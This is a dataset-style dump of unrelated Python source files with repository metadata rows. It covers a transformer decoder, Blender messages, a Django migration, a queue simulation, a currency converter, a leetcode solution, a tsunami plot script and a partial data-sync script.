__all__ = ['Decoder']
class DecoderLayer(nn.Module):
def __init__(self, d_model, d_inner, n_head, d_k, d_v, dropout=0.1):
super().__init__()
self.enc_attn = MultiHeadAttention(n_head, d_model, d_k, d_v, dropout=dropout)
self.pos_ffn1 = PositionwiseFeedForward(d_model, d_inner, dropout=dropout)
def forward(self, dec_input, enc_output, dec_enc_attn_mask=None):
dec_output = self.enc_attn(dec_input, enc_output, enc_output, mask=dec_enc_attn_mask)
dec_output = self.pos_ffn1(dec_output)
return dec_output
class Decoder(nn.Module):
def __init__(self, opt):
super().__init__()
self.layer_stack = nn.ModuleList([
DecoderLayer(opt.d_model, opt.d_inner, opt.n_head, opt.d_k, opt.d_v, dropout=opt.dropout)
for _ in range(opt.n_layers_dec)])
def forward(self, dec_input, enc_outputs, mask):
dec_output = dec_input
for dec_layer in self.layer_stack:
dec_output = dec_layer(dec_output, enc_outputs[-1], dec_enc_attn_mask=mask)
return dec_output
| 895 | 13 | 154 |
378cf7dca487527b4a9f6e1bf40392184760e105 | 2,456 | py | Python | blendernc/messages.py | blendernc/blendernc | 11a545270720e5489174b39693d317a797eea273 | [
"MIT"
] | 39 | 2020-06-15T15:58:43.000Z | 2022-02-02T01:11:57.000Z | blendernc/messages.py | netgodz/blendernc | 09ed7c7791da46abb2c5fd3ee83286ef0bf82302 | [
"MIT"
] | 137 | 2020-06-19T15:29:06.000Z | 2022-03-30T11:18:55.000Z | blendernc/messages.py | netgodz/blendernc | 09ed7c7791da46abb2c5fd3ee83286ef0bf82302 | [
"MIT"
] | 8 | 2020-06-17T09:33:12.000Z | 2022-01-21T00:26:19.000Z | #!/usr/bin/env python3
import warnings
import bpy
# TODO Replace all messages with print_message.
# Possibly shift to class when blendernc is initiated. and move to logging.
| 23.390476 | 88 | 0.675896 | #!/usr/bin/env python3
import warnings
import bpy
# TODO Replace all messages with print_message.
# Possibly shift to class when blendernc is initiated. and move to logging.
class PrintMessage(object):
def __init__(self, text, title, icon):
self.message = text()
self.title = title
self.icon = icon
self.print_message()
def print_message(self):
if not bpy.app.background:
bpy.context.window_manager.popup_menu(
self.message_contructor, title=self.title, icon=self.icon
)
else:
message = u"Running in background mode,\n {0}".format(self.message)
warnings.warn(message)
def message_contructor(self, wm_self, context):
wm_self.layout.label(text=self.message)
def asign_material():
text = "Assign material to object!"
return text
def load_after_restart():
text = "This change will be loaded after restarting Blender or creating a new file."
return text
def active_selection_preference():
text = "The active selection has preference over picked object. "
text += "Make sure you selected the right mesh to apply material."
return text
def huge_image():
text = "Image is larger than 4096x4096 pixels, reduce the resolution."
return text
def drop_dim():
text = "4D field, drop a dimension or select a slice"
return text
def unselected_object():
text = "Select an object to apply material."
return text
def select_file():
text = "Select a file!"
return text
def no_cached_image():
text = "Images haven't been cached."
return text
def no_cached_nodes():
text = "NodeTree hasn't been cached."
return text
def client_exists():
text = "Client exists; a new client will be created."
return text
def same_min_max_value():
text = "Random sampling has been attempted 4 times. "
text += "Please increase the resolution "
text += "or define the max and min values of the dataset "
text += "by using a Range node."
return text
def unselected_datacube():
text = "Select a variable from the datacube."
return text
def unselected_variable():
text = "Reselect a variable from the datacube."
return text
def unselected_dim(self, context):
self.layout.label(text="Select a dimension to drop.")
def unselected_coord(self, context):
self.layout.label(text="Select a coordinate to drop.")
| 1,811 | 6 | 447 |
25d83a23955fc06a3f295c7d49f12798eea2f86b | 1,911 | py | Python | raspeedi/migrations/0001_initial.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | raspeedi/migrations/0001_initial.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | raspeedi/migrations/0001_initial.py | Nels885/csd_dashboard | aa5a3b970c50a2a93af722f962bd87c3728f233c | [
"MIT"
] | null | null | null | # Generated by Django 2.2.1 on 2019-06-04 11:41
from django.db import migrations, models
| 57.909091 | 239 | 0.591313 | # Generated by Django 2.2.1 on 2019-06-04 11:41
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Raspeedi',
fields=[
('ref_boitier', models.BigIntegerField(primary_key=True, serialize=False, verbose_name='référence boîtier')),
('produit', models.CharField(choices=[('RT4', 'RT4'), ('RT5', 'RT5'), ('RT6', 'RT6'), ('RT6v2', 'RT6 version 2'), ('SMEG', 'SMEG'), ('SMEGP', 'SMEG+ / SMEG+ IV1'), ('SMEGP2', 'SMEG+ IV2')], max_length=20)),
('facade', models.CharField(max_length=2, verbose_name='façade')),
('type', models.CharField(choices=[('RAD', 'Radio'), ('NAV', 'Navigation')], max_length=3)),
('dab', models.BooleanField(default=False, verbose_name='DAB')),
('cam', models.BooleanField(default=False, verbose_name='caméra de recul')),
('dump_peedi', models.CharField(blank=True, max_length=25, null=True, verbose_name='dump PEEDI')),
('cd_version', models.CharField(blank=True, max_length=10, null=True)),
('media', models.CharField(choices=[('N/A', 'Vide'), ('HDD', 'Disque Dur'), ('8Go', 'Carte SD 8Go'), ('16Go', 'Carte SD 16Go'), ('8Go 16Go', 'Carte SD 8 ou 16 Go')], max_length=20, null=True, verbose_name='type de média')),
('carto', models.CharField(blank=True, max_length=20, null=True, verbose_name='version cartographie')),
('dump_renesas', models.CharField(blank=True, max_length=50, null=True)),
('ref_mm', models.CharField(blank=True, max_length=200, null=True)),
('connecteur_ecran', models.IntegerField(choices=[(1, '1'), (2, '2')], null=True, verbose_name="nombre de connecteur d'écran")),
],
),
]
| 0 | 1,804 | 23 |
98075587e2bfd7e8b06a04f56e0bdc4ea5bc88f8 | 5,808 | py | Python | TP3/MM1K.py | NicolasBologna/Simulacion | d407379b182a373d9f28ca74c25472e711b5fc0f | [
"MIT"
] | null | null | null | TP3/MM1K.py | NicolasBologna/Simulacion | d407379b182a373d9f28ca74c25472e711b5fc0f | [
"MIT"
] | null | null | null | TP3/MM1K.py | NicolasBologna/Simulacion | d407379b182a373d9f28ca74c25472e711b5fc0f | [
"MIT"
] | null | null | null | import sys
import numpy as np
import statistics
import matplotlib.pyplot as plt
from MM1Utiles import funExpon
#README
#Criterio de estabilidad MM1: la tasa de servicio debe ser mayor que la tasa de llegada
NumEvents = 2 #Defimos número de tipos de eventos (usamos 2: arribos y llegadas)
#Constantes a usar para entender mejor el código
BUSY = 1
IDLE = 0
#QLIMIT = 10**5 #Hay que probar cambiando
if __name__ == '__main__':
global MeanInterarrival, MeanService, NumDelaysRequired, QLIMIT
MeanInterarrival = 2.5 #tiempo medio de llegada **lambda
MeanService = 10 #tiempo medio de servicio **MU
NumDelaysRequired = 10000 #número total de clientes cuyas demoras serán observadas
print("Mean Interarrival: ",MeanInterarrival,"Mean Service: ",MeanService,"Number delays Required (cuantas personas ): ", NumDelaysRequired)
lista_media_arribos = [2.5, 5, 7.5, 10, 12.5]
lista_limites_cola = [0, 2, 5, 10, 50]
lista_conjunto = []
for limiteCola in reversed(lista_limites_cola):
lista_individual = []
for mediaArribo in reversed(lista_media_arribos):
MeanInterarrival = mediaArribo
QLIMIT = limiteCola
n = 10
lista_recahzados = []
for i in range(n):
rta = ExecuteSimulation()
lista_recahzados.append(rta)
lista_individual.append([mediaArribo,round(statistics.mean(lista_recahzados),4)])
print(round(MeanInterarrival*MeanService,0), "\% & ", QLIMIT , " & ", round(statistics.mean(lista_recahzados),4), "\\\\")
lista_conjunto.append([limiteCola, lista_individual])
for limiteCola, lista_individual in lista_conjunto:
print(limiteCola,lista_individual)
lista_relacion = []
lista_probDenegado = []
for i,j in lista_individual:
lista_relacion.append(i*10)
lista_probDenegado.append(j)
plt.title('probabilidad de denegación de \nservicio con limite de cola = '+ str(limiteCola))
plt.plot(lista_relacion, lista_probDenegado, markersize=1, lw=1,color='r')
plt.grid(True)
plt.xlabel('Porcentaje de arribo con respecto al servicio')
plt.ylabel('Probabilidad de denegación')
plt.savefig('Prob_denegación_'+str(limiteCola)+'.png')
plt.show()
| 31.394595 | 145 | 0.660813 | import sys
import numpy as np
import statistics
import matplotlib.pyplot as plt
from MM1Utiles import funExpon
#README
#Criterio de estabilidad MM1: la tasa de servicio debe ser mayor que la tasa de llegada
NumEvents = 2 #Defimos número de tipos de eventos (usamos 2: arribos y llegadas)
#Constantes a usar para entender mejor el código
BUSY = 1
IDLE = 0
#QLIMIT = 10**5 #Hay que probar cambiando
def Report():
global NumCustsDelayed, NumRejected
return NumRejected/NumArrivals
def Initialize():
global MeanInterarrival, Time, TimeNextEvent, ServerStatus, NumCustsDelayed, TotalOfDelays, \
AreaNumInQ, AreaServerStatus, NextEventType, NumDelaysRequired, NumInQ, MeanService, TimeLastEvent, TimeArrival, NumRejected, NumArrivals
Time = 0
ServerStatus = IDLE
#variables enteras
NextEventType = 0
NumCustsDelayed = 0
NumInQ = 0 #número de clientes en cola
ServerStatus = 0
NumRejected = 0
NumArrivals = 0
#variables reales
AreaNumInQ = 0 #área debajo de la función número de clientes en cola
AreaServerStatus = 0
Time = 0
TimeLastEvent = 0 #tiempo del último evento que cambió el número en cola
TotalOfDelays = 0 #número de clientes que completaron sus demoras
#arrays
TimeArrival = np.zeros([QLIMIT+1])
TimeNextEvent = np.zeros([NumEvents+1]) #arreglo que contiene el tiempo del próximo evento I en la posición TimeNextEvent[I]
TimeNextEvent[1] = Time + funExpon(1/MeanInterarrival)
TimeNextEvent[2] = 10**30
def Timing():
global Time, NextEventType
MinTimeNextEvent = 10**29
NextEventType = 0
for i in range(1,NumEvents+1):
if TimeNextEvent[i] < MinTimeNextEvent:
MinTimeNextEvent = TimeNextEvent[i]
NextEventType = i
if (NextEventType > 0):
Time = TimeNextEvent[NextEventType]
else:
print("La lista de eventos está vacía en el momento: ", Time, " NextEventType == 0, error en timing")
sys.exit()
def Arrive():
global ServerStatus,TimeArrival, TotalOfDelays, NumCustsDelayed, TimeNextEvent, NumInQ, MeanService, NumRejected, NumArrivals
TimeNextEvent[1] = Time + funExpon(1/MeanInterarrival)
NumArrivals += 1
if ServerStatus == BUSY:
NumInQ += 1
if NumInQ > QLIMIT:
#print(NumRejected)
NumInQ -= 1
NumRejected += 1
else:
TimeArrival[NumInQ] = Time
else:
Delay = 0
TotalOfDelays = TotalOfDelays + Delay
NumCustsDelayed = NumCustsDelayed + 1
ServerStatus = BUSY
TimeNextEvent[2] = Time + funExpon(1/MeanService)
def Depart():
global NumInQ, TotalOfDelays,NumCustsDelayed, ServerStatus, TimeNextEvent, Time, TimeArrival
if (NumInQ == 0):
ServerStatus = IDLE
TimeNextEvent[2] = 10**30
else:
NumInQ = NumInQ - 1
Delay = Time - TimeArrival[1]
TotalOfDelays = TotalOfDelays + Delay
NumCustsDelayed += 1
TimeNextEvent[2] = Time + funExpon(1/MeanService)
for I in range(1,NumInQ+1):
TimeArrival[I] = TimeArrival[I+1]
def UpdateTimeAvgStats():
global TimeLastEvent, AreaNumInQ, AreaServerStatus, Time
TimeSinceLastEvent = Time - TimeLastEvent
TimeLastEvent = Time
AreaNumInQ = AreaNumInQ + NumInQ * TimeSinceLastEvent
AreaServerStatus = AreaServerStatus + ServerStatus * TimeSinceLastEvent
def ExecuteSimulation():
global NumCustsDelayed, NumDelaysRequired
Initialize()
while(NumCustsDelayed < NumDelaysRequired):
Timing()
UpdateTimeAvgStats()
if (NextEventType == 1):
Arrive()
elif (NextEventType == 2):
Depart()
else:
print ("Error in NextEventType, Value = ",NextEventType)
return Report()
if __name__ == '__main__':
global MeanInterarrival, MeanService, NumDelaysRequired, QLIMIT
MeanInterarrival = 2.5 #tiempo medio de llegada **lambda
MeanService = 10 #tiempo medio de servicio **MU
NumDelaysRequired = 10000 #número total de clientes cuyas demoras serán observadas
print("Mean Interarrival: ",MeanInterarrival,"Mean Service: ",MeanService,"Number delays Required (cuantas personas ): ", NumDelaysRequired)
lista_media_arribos = [2.5, 5, 7.5, 10, 12.5]
lista_limites_cola = [0, 2, 5, 10, 50]
lista_conjunto = []
for limiteCola in reversed(lista_limites_cola):
lista_individual = []
for mediaArribo in reversed(lista_media_arribos):
MeanInterarrival = mediaArribo
QLIMIT = limiteCola
n = 10
lista_recahzados = []
for i in range(n):
rta = ExecuteSimulation()
lista_recahzados.append(rta)
lista_individual.append([mediaArribo,round(statistics.mean(lista_recahzados),4)])
print(round(MeanInterarrival*MeanService,0), "\% & ", QLIMIT , " & ", round(statistics.mean(lista_recahzados),4), "\\\\")
lista_conjunto.append([limiteCola, lista_individual])
for limiteCola, lista_individual in lista_conjunto:
print(limiteCola,lista_individual)
lista_relacion = []
lista_probDenegado = []
for i,j in lista_individual:
lista_relacion.append(i*10)
lista_probDenegado.append(j)
plt.title('probabilidad de denegación de \nservicio con limite de cola = '+ str(limiteCola))
plt.plot(lista_relacion, lista_probDenegado, markersize=1, lw=1,color='r')
plt.grid(True)
plt.xlabel('Porcentaje de arribo con respecto al servicio')
plt.ylabel('Probabilidad de denegación')
plt.savefig('Prob_denegación_'+str(limiteCola)+'.png')
plt.show()
| 3,294 | 0 | 173 |
65dc232a4e565e414a1ddeeebbd38bc5f5656593 | 599 | py | Python | 13022.py | WaiNaat/BOJ-Python | 3365ef090c7dcf6e6a598fea0b25c416a5a3e01b | [
"MIT"
] | null | null | null | 13022.py | WaiNaat/BOJ-Python | 3365ef090c7dcf6e6a598fea0b25c416a5a3e01b | [
"MIT"
] | null | null | null | 13022.py | WaiNaat/BOJ-Python | 3365ef090c7dcf6e6a598fea0b25c416a5a3e01b | [
"MIT"
] | null | null | null | # input
word = input()
# process
'''
처음에 o가 나올때까지 w의 개수를 세면 됨.
'''
isValid = True
i = 0
while i < len(word):
# w
wCnt = 0
while i < len(word) and word[i] == 'w':
i += 1
wCnt += 1
if wCnt == 0: isValid = False
# o
cnt = 0
while i < len(word) and word[i] == 'o':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
# l
cnt = 0
while i < len(word) and word[i] == 'l':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
# f
cnt = 0
while i < len(word) and word[i] == 'f':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
if not isValid: break
# output
print(1 if isValid else 0) | 16.638889 | 40 | 0.540902 | # input
word = input()
# process
'''
처음에 o가 나올때까지 w의 개수를 세면 됨.
'''
isValid = True
i = 0
while i < len(word):
# w
wCnt = 0
while i < len(word) and word[i] == 'w':
i += 1
wCnt += 1
if wCnt == 0: isValid = False
# o
cnt = 0
while i < len(word) and word[i] == 'o':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
# l
cnt = 0
while i < len(word) and word[i] == 'l':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
# f
cnt = 0
while i < len(word) and word[i] == 'f':
i += 1
cnt += 1
if cnt != wCnt: isValid = False
if not isValid: break
# output
print(1 if isValid else 0) | 0 | 0 | 0 |
a5cbcb842d821b1612b92455a043bbf547f0e203 | 795 | py | Python | zaimcsvconverter/zaim_csv_converter.py | yukihiko-shinoda/zaim-csv-converter | 28b124573a6dfdb03fc94985c84684e639346b2c | [
"MIT"
] | 1 | 2020-01-09T00:45:20.000Z | 2020-01-09T00:45:20.000Z | zaimcsvconverter/zaim_csv_converter.py | yukihiko-shinoda/zaim-csv-converter | 28b124573a6dfdb03fc94985c84684e639346b2c | [
"MIT"
] | 4 | 2020-05-31T19:55:26.000Z | 2021-11-13T09:54:02.000Z | zaimcsvconverter/zaim_csv_converter.py | yukihiko-shinoda/zaim-csv-converter | 28b124573a6dfdb03fc94985c84684e639346b2c | [
"MIT"
] | null | null | null | """This module implements converting steps from account CSV to Zaim CSV."""
from zaimcsvconverter import CONFIG, PATH_FILE_CONFIG, DirectoryCsv
from zaimcsvconverter.convert_table_importer import ConvertTableImporter
from zaimcsvconverter.input_csv_converter_iterator import InputCsvConverterIterator
from zaimcsvconverter.models import initialize_database
class ZaimCsvConverter:
"""This class implements converting steps from account CSV to Zaim CSV."""
@staticmethod
def execute() -> None:
"""This method executes all CSV converters."""
CONFIG.load(PATH_FILE_CONFIG)
initialize_database()
ConvertTableImporter(DirectoryCsv.CONVERT.value).execute()
InputCsvConverterIterator(DirectoryCsv.INPUT.value, DirectoryCsv.OUTPUT.value).execute()
| 44.166667 | 96 | 0.788679 | """This module implements converting steps from account CSV to Zaim CSV."""
from zaimcsvconverter import CONFIG, PATH_FILE_CONFIG, DirectoryCsv
from zaimcsvconverter.convert_table_importer import ConvertTableImporter
from zaimcsvconverter.input_csv_converter_iterator import InputCsvConverterIterator
from zaimcsvconverter.models import initialize_database
class ZaimCsvConverter:
"""This class implements converting steps from account CSV to Zaim CSV."""
@staticmethod
def execute() -> None:
"""This method executes all CSV converters."""
CONFIG.load(PATH_FILE_CONFIG)
initialize_database()
ConvertTableImporter(DirectoryCsv.CONVERT.value).execute()
InputCsvConverterIterator(DirectoryCsv.INPUT.value, DirectoryCsv.OUTPUT.value).execute()
| 0 | 0 | 0 |
d5e7c18bd1ec88ecd0da18a5cacdc574bd5930a8 | 1,212 | py | Python | classroom/migrations/0004_roomstream.py | Minecraft3193092/school-classroom | c0ea63f09d4125b0ae9033fd8b0a4aab2604bb42 | [
"Apache-2.0"
] | 11 | 2021-07-16T11:08:29.000Z | 2022-01-10T12:53:03.000Z | classroom/migrations/0004_roomstream.py | Minecraft3193092/school-classroom | c0ea63f09d4125b0ae9033fd8b0a4aab2604bb42 | [
"Apache-2.0"
] | 1 | 2021-11-11T09:35:20.000Z | 2022-01-13T05:15:19.000Z | classroom/migrations/0004_roomstream.py | Allesanddro/Zooming-cls | 5555f1aa588ede6707b34ed8ac91bd4daeb4989c | [
"Apache-2.0"
] | 9 | 2021-09-02T06:30:02.000Z | 2022-03-28T16:53:05.000Z | # Generated by Django 3.1.5 on 2021-07-13 07:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
| 36.727273 | 129 | 0.618812 | # Generated by Django 3.1.5 on 2021-07-13 07:22
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('classroom', '0003_auto_20210712_1322'),
]
operations = [
migrations.CreateModel(
name='RoomStream',
fields=[
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('post', models.TextField()),
('is_featured', models.BooleanField(default=False)),
('room', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='classroom.classroom')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]
| 0 | 1,020 | 23 |
dc4949ec7770471dd8d5f3920a8442c211a7a49b | 1,584 | py | Python | src/ch02/plot_height_multipanel.py | AAGAN/tsunami | 82635516dcb7f85eb6434ffdb98a9ddc4c1403ad | [
"MIT"
] | 103 | 2018-03-29T23:39:31.000Z | 2022-03-29T12:24:25.000Z | src/ch02/plot_height_multipanel.py | AAGAN/tsunami | 82635516dcb7f85eb6434ffdb98a9ddc4c1403ad | [
"MIT"
] | 13 | 2018-04-06T14:33:04.000Z | 2022-03-21T19:50:12.000Z | src/ch02/plot_height_multipanel.py | AAGAN/tsunami | 82635516dcb7f85eb6434ffdb98a9ddc4c1403ad | [
"MIT"
] | 32 | 2018-04-01T19:54:12.000Z | 2022-03-27T14:06:03.000Z | """
plot_water_height_multipanel.py
Reads output of tsunami and plots the results in an image file.
"""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('input_file', help='text file output by the tsunami simulator (chapter 2 version)')
args = parser.parse_args()
input_file = args.input_file
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from sys import platform
if platform == 'win32':
unicodeVar = 'utf-16'
else:
unicodeVar = 'utf-8'
matplotlib.use('Agg')
matplotlib.rcParams.update({'font.size': 16})
# read data into a list
data = [line.rstrip().split() for line in open(input_file, encoding = unicodeVar).readlines()]
time = [float(line[0]) for line in data]
h = np.array([[float(x) for x in line[1:]] for line in data])
x = np.arange(1, h.shape[1]+1)
time_steps = [0, 25, 50, 75]
fig = plt.figure(figsize=(8, 10))
axes = [plt.subplot2grid((4, 1), (row, 0), colspan=1, rowspan=1)
for row in range(4)]
for ax in axes:
n = axes.index(ax)
ax.plot(x, h[time_steps[n], :], 'b-')
ax.fill_between(x, 0, h[time_steps[n], :], color='b', alpha=0.4)
ax.grid()
ax.set_xlim(1, 100)
ax.set_ylim(0, 1)
ax.set_ylabel('Height', fontsize=16)
ax.set_xticks([25, 50, 75, 100])
ax.set_yticks([0, 0.25, 0.5, 0.75, 1])
for ax in axes:
n = axes.index(ax)
ax.set_title('Time step ' + '%3i' % time_steps[n])
for ax in axes[:-1]:
ax.set_xticklabels([])
axes[3].set_xlabel('', fontsize=16)
axes[-1].set_xlabel('Spatial grid index')
plt.savefig('water_height_ch02.svg')
plt.close(fig)
| 25.967213 | 103 | 0.667298 | """
plot_water_height_multipanel.py
Reads output of tsunami and plots the results in an image file.
"""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('input_file', help='text file output by the tsunami simulator (chapter 2 version)')
args = parser.parse_args()
input_file = args.input_file
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
from sys import platform
if platform == 'win32':
unicodeVar = 'utf-16'
else:
unicodeVar = 'utf-8'
matplotlib.use('Agg')
matplotlib.rcParams.update({'font.size': 16})
# read data into a list
data = [line.rstrip().split() for line in open(input_file, encoding = unicodeVar).readlines()]
time = [float(line[0]) for line in data]
h = np.array([[float(x) for x in line[1:]] for line in data])
x = np.arange(1, h.shape[1]+1)
time_steps = [0, 25, 50, 75]
fig = plt.figure(figsize=(8, 10))
axes = [plt.subplot2grid((4, 1), (row, 0), colspan=1, rowspan=1)
for row in range(4)]
for ax in axes:
n = axes.index(ax)
ax.plot(x, h[time_steps[n], :], 'b-')
ax.fill_between(x, 0, h[time_steps[n], :], color='b', alpha=0.4)
ax.grid()
ax.set_xlim(1, 100)
ax.set_ylim(0, 1)
ax.set_ylabel('Height', fontsize=16)
ax.set_xticks([25, 50, 75, 100])
ax.set_yticks([0, 0.25, 0.5, 0.75, 1])
for ax in axes:
n = axes.index(ax)
ax.set_title('Time step ' + '%3i' % time_steps[n])
for ax in axes[:-1]:
ax.set_xticklabels([])
axes[3].set_xlabel('', fontsize=16)
axes[-1].set_xlabel('Spatial grid index')
plt.savefig('water_height_ch02.svg')
plt.close(fig)
| 0 | 0 | 0 |
7397c45fd6ce87f11502a2835e27ad1692511b42 | 1,751 | py | Python | Leet-Code/Backspace String Compare.py | aminzayer/My-Python-Code | 475e99a134f11e5784478c1d68bce7033ffe02a2 | [
"MIT"
] | 2 | 2022-02-16T22:24:14.000Z | 2022-02-24T16:59:42.000Z | Leet-Code/Backspace String Compare.py | aminzayer/My-Python-Code | 475e99a134f11e5784478c1d68bce7033ffe02a2 | [
"MIT"
] | null | null | null | Leet-Code/Backspace String Compare.py | aminzayer/My-Python-Code | 475e99a134f11e5784478c1d68bce7033ffe02a2 | [
"MIT"
] | null | null | null | # Backspace String Compare
""" Given two strings s and t, return true if they are equal when both are typed into empty text editors. '#' means a backspace character.
Note that after backspacing an empty text, the text will continue empty.
Example 1:
Input: s = "ab#c", t = "ad#c"
Output: true
Explanation: Both s and t become "ac".
Example 2:
Input: s = "ab##", t = "c#d#"
Output: true
Explanation: Both s and t become "".
Example 3:
Input: s = "a#c", t = "b"
Output: false
Explanation: s becomes "c" while t becomes "b".
Constraints:
1 <= s.length, t.length <= 200
s and t only contain lowercase letters and '#' characters.
"""
| 24.661972 | 138 | 0.467733 | # Backspace String Compare
""" Given two strings s and t, return true if they are equal when both are typed into empty text editors. '#' means a backspace character.
Note that after backspacing an empty text, the text will continue empty.
Example 1:
Input: s = "ab#c", t = "ad#c"
Output: true
Explanation: Both s and t become "ac".
Example 2:
Input: s = "ab##", t = "c#d#"
Output: true
Explanation: Both s and t become "".
Example 3:
Input: s = "a#c", t = "b"
Output: false
Explanation: s becomes "c" while t becomes "b".
Constraints:
1 <= s.length, t.length <= 200
s and t only contain lowercase letters and '#' characters.
"""
class Solution:
def backspaceCompare(self, s: str, t: str) -> bool:
left_1, left_2 = len(s) - 1, len(t) - 1
sign_1, sign_2 = 0, 0
while left_1 >= 0 or left_2 >= 0:
while left_1 >= 0:
if s[left_1] == '#':
sign_1 += 1
left_1 -= 1
elif sign_1 > 0:
sign_1 -= 1
left_1 -= 1
else:
break
while left_2 >= 0:
if t[left_2] == '#':
sign_2 += 1
left_2 -= 1
elif sign_2 > 0:
sign_2 -= 1
left_2 -= 1
else:
break
if left_1 < 0 and left_2 < 0:
return True
if left_1 >= 0 and left_2 < 0:
return False
if left_1 < 0 and left_2 >= 0:
return False
if s[left_1] != t[left_2]:
return False
left_1 -= 1
left_2 -= 1
return True
| 1,058 | -6 | 49 |
27ad12942b6502b5ad80e3d82eafd85656556fd1 | 632 | py | Python | jpipes/cli/controllers/base.py | derks/jpipes | 91f4614da7de7d982bf331d307d30fd7994eaa7b | [
"BSD-3-Clause"
] | 1 | 2020-04-25T13:27:05.000Z | 2020-04-25T13:27:05.000Z | jpipes/cli/controllers/base.py | derks/jpipes | 91f4614da7de7d982bf331d307d30fd7994eaa7b | [
"BSD-3-Clause"
] | 2 | 2017-04-28T18:31:12.000Z | 2017-04-28T19:23:48.000Z | jpipes/cli/controllers/base.py | derks/jpipes | 91f4614da7de7d982bf331d307d30fd7994eaa7b | [
"BSD-3-Clause"
] | null | null | null |
import sys
from time import sleep
from cement.ext.ext_argparse import ArgparseController, expose as ex
| 24.307692 | 68 | 0.672468 |
import sys
from time import sleep
from cement.ext.ext_argparse import ArgparseController, expose as ex
class BaseController(ArgparseController):
class Meta:
label = 'base'
description = 'Jenkins Pipeline Automation'
default_func = '_default'
@ex(hide=True)
def _default(self):
self.app.log.warning('Sub-Command required!')
self.app.args.print_help()
class PipelineController(ArgparseController):
class Meta:
label = None
help = 'pipeline sub-controller'
def __init__(self, *args, **kw):
super(PipelineController, self).__init__(*args, **kw)
| 160 | 320 | 46 |
501996cb5578902068a7dde08a1ee813c501b3a5 | 921 | py | Python | pytdd/dollar.py | marcelotrevisani/tdd-presentation | a8851c5df4c15dcfe47c16384a82d7a883e2102d | [
"MIT"
] | null | null | null | pytdd/dollar.py | marcelotrevisani/tdd-presentation | a8851c5df4c15dcfe47c16384a82d7a883e2102d | [
"MIT"
] | null | null | null | pytdd/dollar.py | marcelotrevisani/tdd-presentation | a8851c5df4c15dcfe47c16384a82d7a883e2102d | [
"MIT"
] | null | null | null | import requests
URL_API = r"https://www.alphavantage.co/query?function=CURRENCY_EXCHANGE_RATE"
API_KEY = "FJOSXYTTSW4VUT7H"
| 27.088235 | 79 | 0.661238 | import requests
URL_API = r"https://www.alphavantage.co/query?function=CURRENCY_EXCHANGE_RATE"
API_KEY = "FJOSXYTTSW4VUT7H"
class Dollar:
def __init__(self, value):
self._value = value
def __add__(self, dollar_add):
return Dollar(self._value + dollar_add.value)
@property
def value(self):
return self._value
def __eq__(self, compare):
return self._value == compare.value
def convert_to_pound(self):
url_request = (
f"{URL_API}" f"&from_currency=USD&to_currency=GBP&apikey={API_KEY}"
)
response = requests.get(url_request)
data_exchange = response.json()
exchange_rate = data_exchange["Realtime Currency Exchange Rate"]
exchange_rate = float(exchange_rate["5. Exchange Rate"])
return Dollar(self.value * exchange_rate)
def __repr__(self):
return f"Dollar(value={self._value})"
| 605 | 167 | 23 |
70cf10f92c92a45bd7efc7454c1bd861a6c5caf3 | 3,525 | py | Python | experiments/mj60/sync_data.py | sweigart/pygama | 3c5fe4c69230814933b2de879b9a305ff0d4ad5e | [
"Apache-2.0"
] | 13 | 2019-05-01T01:37:30.000Z | 2022-03-18T08:52:19.000Z | experiments/mj60/sync_data.py | sweigart/pygama | 3c5fe4c69230814933b2de879b9a305ff0d4ad5e | [
"Apache-2.0"
] | 111 | 2019-03-25T00:50:48.000Z | 2022-03-30T17:13:43.000Z | experiments/mj60/sync_data.py | sweigart/pygama | 3c5fe4c69230814933b2de879b9a305ff0d4ad5e | [
"Apache-2.0"
] | 52 | 2019-01-24T21:05:04.000Z | 2022-03-07T23:37:55.000Z | #!/usr/bin/env python3
import os
import glob
import json
from datetime import datetime
import subprocess as sp
from pprint import pprint
from pygama.utils import *
def main():
"""
sync MJ60 data with cenpa-rocks.
- rsync the entire Data/MJ60 directory using the $DATADIR variable
- set flags to then remove raw/raw_to_dsp/tier2 files
Hopefully we can reuse this script for C1.
"""
global runDB
with open("runDB.json") as f:
runDB = json.load(f)
# run_rsync()
daq_cleanup()
def run_rsync(test=False):
"""
run rsync on the entire $DATADIR/MJ60 folder (can take a while ...)
"""
if "mjcenpa" not in os.environ["USER"]:
print("Error, we're not on the MJ60 DAQ machine. Exiting ...")
exit()
#raw_dir = runDB["loc_dir"] + "/"
raw_dir = os.path.expandvars(runDB["loc_dir"] + "/")
raw_rocks = "{}:{}/".format(runDB["rocks_login"], runDB["rocks_dir"])
if test:
cmd = "rsync -avh --dry-run {} {}".format(raw_dir, raw_rocks)
else:
cmd = "rsync -avh {} {}".format(raw_dir, raw_rocks)
sh(cmd)
def daq_cleanup(keep_t1=False, keep_t2=False):
"""
build a list of files on the DAQ and rocks, check integrity,
and delete files on the DAQ only if we're sure the transfer was successful.
MJ60 and C1 ORCA raw files have "BackgroundRun" in the filenames
"""
if "mjcenpa" not in os.environ["USER"]:
print("Error, we're not on the MJ60 DAQ machine. Exiting ...")
exit()
# local (DAQ) list
datadir_loc = os.path.expandvars(runDB["loc_dir"] + "/")
filelist_loc = glob.glob(datadir_loc + "/**", recursive=True)
# for f in filelist_loc:
# print(f)
# remote list
